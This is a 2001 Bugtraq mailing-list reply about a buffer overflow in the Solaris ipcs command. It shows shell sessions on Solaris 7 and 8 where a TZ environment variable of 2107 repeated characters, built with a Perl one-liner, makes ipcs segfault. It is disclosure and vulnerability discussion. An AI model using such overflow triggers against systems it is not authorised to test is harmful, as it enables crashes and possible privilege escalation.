[20272] in bugtraq
Re: Solaris ipcs vulnerability
daemon@ATHENA.MIT.EDU (Robert Varga)
Tue Apr 17 15:27:48 2001
Mail-Followup-To: Robert Varga <nite@hq.alert.sk>, BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010417123017.A26734@hq.alert.sk>
Date: Tue, 17 Apr 2001 12:30:17 +0200
Reply-To: Robert Varga <nite@HQ.ALERT.SK>
From: Robert Varga <nite@HQ.ALERT.SK>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <15067.23174.388984.783662@tempermental.cbl.umces.edu>; from
sinkr@CBL.UMCES.EDU on Mon, Apr 16, 2001 at 04:48:06PM -0400
On Mon, Apr 16, 2001 at 04:48:06PM -0400, Robert Sink wrote:
> I've tried:
>
> TZ=`/usr/local/bin/perl -e 'print "A"x1107'`
>
> ...on... both 64 bit Solaris 8 and Solaris 7 (we have no 32 bit
> machines here) and cannot get the programs to crash. They just
> happily display the A's, plus the other information and exit normally.
>
> Solaris 7: SunOS xxx 5.7 Generic_106541-12 sun4u sparc
> Solaris 8: SunOS xxx 5.8 Generic_108528-05 sun4u sparc
>
> I keep the patches on the bleeding edge, but I can find nothing
> offhand in the latest patchdiag.xref that would have altered this.
>
> Am I missing something?
Seems Solaris 8 has a larger buffer (my guess is 2k), yet it still overflows:
Solaris 8, 64bit:
[root@ias1 /root]# uname -a
SunOS ias1 5.8 Generic_108528-06 sun4u sparc SUNW,UltraAX-i2
[root@ias1 /root]# isainfo -b
64
[root@ias1 /root]# export TZ=`/usr/bin/perl -e 'print "A"x2107'`
[root@ias1 /root]# ipcs
Segmentation Fault (core dumped)
Solaris 8, 32bit:
[root@nite /root]# uname -a
SunOS nite 5.8 Generic_108528-06 sun4u sparc SUNW,Ultra-5_10
[root@nite /root]# isainfo -b
32
[root@nite /root]# export TZ=`/usr/bin/perl -e 'print "A"x2107'`
[root@nite /root]# ipcs
Segmentation Fault
Solaris 7, 64bit:
[root@dwhs /root]# uname -a
SunOS dwhs 5.7 Generic_106541-15 sun4u sparc SUNW,Ultra-Enterprise
[root@dwhs /root]# isainfo -b
64
[root@dwhs /root]# export TZ=`/usr/local/bin/perl -e 'print "A"x2107'`
[root@dwhs /root]# ipcs
Segmentation Fault
-- 
Kind regards,
Robert Varga
------------------------------------------------------------------------------
n@hq.sk http://hq.sk/~nite/gpgkey.txt